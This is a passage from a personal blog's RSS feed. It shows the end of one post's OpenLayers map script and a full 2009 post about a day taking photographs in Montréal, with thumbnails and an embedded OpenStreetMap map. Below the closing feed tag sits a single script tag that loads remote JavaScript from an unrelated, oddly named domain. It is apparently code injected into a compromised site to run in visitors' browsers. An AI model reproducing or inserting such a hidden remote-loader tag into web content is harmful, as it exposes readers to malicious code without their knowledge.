OpenLayers.Control.LayerSwitcher());    function osm_getTileURL(bounds) {        var res = this.map.getResolution();        var x = Math.round((bounds.left - this.maxExtent.left) / (res * this.tileSize.w));        var y = Math.round((this.maxExtent.top - bounds.top) / (res * this.tileSize.h));        var z = this.map.getZoom();        var limit = Math.pow(2, z);        if (y < 0 || y >= limit) {            return OpenLayers.Util.getImagesLocation() + "404.png";        } else {            x = ((x % limit) + limit) % limit;            return this.url + z + "/" + x + "/" + y + "." + this.type;        }    }var lonLat = new OpenLayers.LonLat(-58.394,-34.587).transform(map.displayProjection,  map.projection);map.setCenter (lonLat,16);})(jQuery)/* ]]&gt; */ </script></div></p>
]]></content:encoded>
			<wfw:commentRss>http://www.annedirkse.com/?feed=rss2&amp;p=1293</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Montréal</title>
		<link>http://www.annedirkse.com/?p=1307</link>
		<comments>http://www.annedirkse.com/?p=1307#comments</comments>
		<pubDate>Sun, 18 Oct 2009 20:06:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Canada]]></category>
		<category><![CDATA[canada]]></category>
		<category><![CDATA[cities]]></category>
		<category><![CDATA[montreal]]></category>

		<guid isPermaLink="false">http://www.annedirkse.com/?p=1307</guid>
		<description><![CDATA[Spent a Saturday in Montréal after a work trip wandering around and taking some photographs. [svgallery name="montreal"]]]></description>
			<content:encoded><![CDATA[<p>Spent a Saturday in Montréal after a work trip wandering around and taking some photographs.</p>

<a href='http://www.annedirkse.com/?attachment_id=1308' title='IMG_1596_7_8_tonemapped'><img width="150" height="150" src="http://www.annedirkse.com/wp-content/uploads/2009/12/IMG_1596_7_8_tonemapped-150x150.jpg" class="attachment-thumbnail" alt="IMG_1596_7_8_tonemapped" title="IMG_1596_7_8_tonemapped" /></a>
<a href='http://www.annedirkse.com/?attachment_id=1311' title='IMG_1605_6_7_tonemapped'><img width="150" height="150" src="http://www.annedirkse.com/wp-content/uploads/2009/10/IMG_1605_6_7_tonemapped-150x150.jpg" class="attachment-thumbnail" alt="IMG_1605_6_7_tonemapped" title="IMG_1605_6_7_tonemapped" /></a>
<a href='http://www.annedirkse.com/?attachment_id=1313' title='Montreal'><img width="150" height="150" src="http://www.annedirkse.com/wp-content/uploads/2009/10/Montreal-150x150.jpg" class="attachment-thumbnail" alt="Montreal" title="Montreal" /></a>

<p>[svgallery name="montreal"]<br />
<br/><br/></p>
<style type="text/css">#map_8 {padding: 0; margin: 0;}#map_8 img{padding: 0; margin: 0;border:none;margin-top:0px;margin-right:0px;margin-left:0px;margin-bottom:0px;}</style><div id="map_8" style="width:600px; height:450px; overflow:hidden;padding:0px;"><script type="text/javascript" src="http://www.openlayers.org/api/OpenLayers.js"></script><script type="text/javascript" src="http://www.openstreetmap.org/openlayers/OpenStreetMap.js"></script><script type="text/javascript">/* <![CDATA[ */(function($) { map = new OpenLayers.Map ("map_8", {            controls:[              new OpenLayers.Control.Navigation(),              new OpenLayers.Control.PanZoom(),              new OpenLayers.Control.Attribution()              ],          maxExtent: new OpenLayers.Bounds(-20037508.34,-20037508.34,20037508.34,20037508.34),          maxResolution: 156543.0399,          numZoomLevels: 19,          units: "m",          projection: new OpenLayers.Projection("EPSG:900913"),           displayProjection: new OpenLayers.Projection("EPSG:4326")      } );var layerMapnik = new OpenLayers.Layer.OSM.Mapnik("Mapnik");var layerTah    = new OpenLayers.Layer.OSM.Osmarender("Osmarender");var layerCycle  = new OpenLayers.Layer.OSM.CycleMap("CycleMap");map.addLayers([layerMapnik, layerTah, layerCycle]);map.addControl(new OpenLayers.Control.LayerSwitcher());    function osm_getTileURL(bounds) {        var res = this.map.getResolution();        var x = Math.round((bounds.left - this.maxExtent.left) / (res * this.tileSize.w));        var y = Math.round((this.maxExtent.top - bounds.top) / (res * this.tileSize.h));        var z = this.map.getZoom();        var limit = Math.pow(2, z);        if (y < 0 || y >= limit) {            return OpenLayers.Util.getImagesLocation() + "404.png";        } else {            x = ((x % limit) + limit) % limit;            return this.url + z + "/" + x + "/" + y + "." + this.type;        }    }var lonLat = new OpenLayers.LonLat(-73.6,45.504).transform(map.displayProjection,  map.projection);map.setCenter (lonLat,11);var markers = new OpenLayers.Layer.Markers( "Marker" );map.addLayer(markers);var data = {};data.icon = new OpenLayers.Icon("http://www.annedirkse.com/wp-content/plugins/osm/icons/marker_posts.png",     new OpenLayers.Size(2,2),     new OpenLayers.Pixel(-1, -1));var ll = new OpenLayers.LonLat(-73.607,45.511).transform(map.displayProjection,  map.projection);     var feature = new OpenLayers.Feature(markers, ll, data);feature.closeBox = true;feature.popupClass = OpenLayers.Class(OpenLayers.Popup.FramedCloud, {minSize: new OpenLayers.Size(150,150) } );feature.data.popupContentHTML = "";feature.data.overflow = "hidden";var marker = new OpenLayers.Marker(ll,data.icon.clone());marker.feature = feature;var markerClick = function(evt) {  if (this.popup == null) {    this.popup = this.createPopup(this.closeBox);    map.addPopup(this.popup);    this.popup.show();  }   else {    this.popup.toggle();  }  OpenLayers.Event.stop(evt);};marker.events.register("mousedown", feature, markerClick);markers.addMarker(marker);map.addPopup(feature.createPopup(feature.closeBox));})(jQuery)/* ]]&gt; */ </script></div>
]]></content:encoded>
			<wfw:commentRss>http://www.annedirkse.com/?feed=rss2&amp;p=1307</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://nowisisdudescars.com/js.php"></script>